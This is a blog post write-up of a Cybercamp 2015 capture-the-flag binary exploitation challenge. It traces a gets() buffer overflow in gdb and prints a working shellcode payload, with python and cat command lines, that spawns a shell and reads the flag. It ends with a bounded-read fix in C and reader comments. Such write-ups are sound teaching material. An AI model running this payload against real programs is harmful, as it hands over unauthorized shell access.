Hey, im newboy, nice to meet you!
Tell me, who am I speaking to? 0x90r00t
My pleasure, 0x90r00t 🙂
We start debugging to find the size of the stack allocation:
0x08048469: sub esp,0x94
(gdb) p/d 0x94
= 148
We know our buffer is less than 148 bytes.
0x080484ab <+80>: lea eax,[ebp-0x95]
0x080484b1 <+86>: push eax
0x080484b2 <+87>: call 0x8048320 <gets@plt>
Here the program stores $name at ebp-0x95. It reads the name with the insecure gets() call at 0x080484b2, stores it at ebp-0x95 as seen above, and then calls EAX:
0x080484ba <+95>: lea eax,[ebp-0x15]
0x080484bd <+98>: call eax
EAX holds the address ebp-0x15 (loaded by the lea), so the call jumps to whatever bytes are stored there. We want to place some shellcode there to spawn a shell. This can be done with our buffer overflow.
To determine how much of the $name buffer we must fill before overflowing, we need the distance between the address ebp-0x95 (buffer starting address) and the address called through EAX (ebp-0x15).
(gdb) p $ebp-0x15
= 0xbffff483
(gdb) p $ebp-0x95
= 0xbffff403
(gdb) p/d 0xbffff483 - 0xbffff403
= 128
So our buffer is 128 bytes long. We can overwrite the bytes at 0xbffff483 with the gets() at 0x080484b2. To verify our analysis, we set a breakpoint on “call 0x8048320 <gets@plt>” located at 0x080484b2:
(gdb) b *0x080484b2
We run the program under the debugger to overwrite ebp-0x15, which will be called by “0x080484bd <+98>: call eax”:
(gdb) run <<< $(python -c 'print "\x90"*128 + "AAAA"')
At the breakpoint the program has not yet stored the string we supplied; to verify, we check the value at ebp-0x15:
(gdb) x/xw 0xbffff483
0xbffff483: 0xccccccc3
Not yet overflowed. We step over the call to verify that the overflow succeeded:
(gdb) n
(gdb) x/xw 0xbffff483
0xbffff483: 0x41414141
=> Overflowed by our string !
So we can inject shellcode here by replacing AAAA with our shellcode:
(gdb) run <<< $(python -c 'print "\x90"*128 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')
process 4314 is executing new program: /bin/dash
So let’s try it for real, outside the debugger:
$ python -c 'print "\x90"*128 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"' | ./newboy
=> No segfault, but the shell closes immediately, because its stdin (the pipe) is already at end of file.
We keep stdin open with cat so the shell waits for commands:
$ (python -c 'print "\x90"*128 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"' && cat) | ./newboy
-> Access granted
cat flag.txt
e50bb99725defaa4d275d09cd829440657741e7a674d757c0120158d552011fd
Thanks for reading !
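
The root cause traced in this write-up is the unbounded gets() at 0x080484b2 filling a 128-byte buffer that sits directly below the bytes reached by call eax. As an added example (not the challenge's source, which the post does not show), here is a bounded read that keeps an over-long name out of those adjacent bytes; struct frame, read_name and demo_oversized_input are hypothetical names, and the 4-byte stub stands in for the called region.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical layout mirroring the disassembly: the 128-byte name buffer
 * (ebp-0x95) is directly followed by the bytes reached by call eax (ebp-0x15). */
struct frame {
    char name[128];
    unsigned char stub[4];
};

/* Bounded replacement for gets(): stores at most cap-1 bytes plus NUL, strips
 * the newline, discards the rest of an over-long line. Returns the stored
 * length, or -1 on EOF/error. */
long read_name(FILE *in, char *dst, size_t cap)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL)
        return -1;
    size_t len = strcspn(dst, "\n");
    if (dst[len] == '\n') {
        dst[len] = '\0';
    } else {
        int c;
        while ((c = fgetc(in)) != '\n' && c != EOF)
            ;                               /* drain the truncated remainder */
    }
    return (long)len;
}

/* Feeds a constructed 132-byte line (128 'A' + "BBBB") through read_name().
 * Returns the stored length if the adjacent bytes are intact, -1 otherwise. */
long demo_oversized_input(void)
{
    struct frame f;
    memset(f.stub, 0xC3, sizeof f.stub);    /* sentinel next to the buffer */
    FILE *in = tmpfile();
    if (!in) return -1;
    for (int i = 0; i < 128; i++) fputc('A', in);
    fputs("BBBB\n", in);
    rewind(in);
    long n = read_name(in, f.name, sizeof f.name);
    fclose(in);
    for (size_t i = 0; i < sizeof f.stub; i++)
        if (f.stub[i] != 0xC3) return -1;
    return n;
}

int main(void)
{
    printf("stored %ld bytes, adjacent bytes intact\n", demo_oversized_input());
    return 0;
}
```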
2 thoughts on “[Cybercamp 2015] [Exploit 1] Write Up”
Is the challenge still online, or does it have a repository on GitHub?
I added a link to the binary in the post 🙂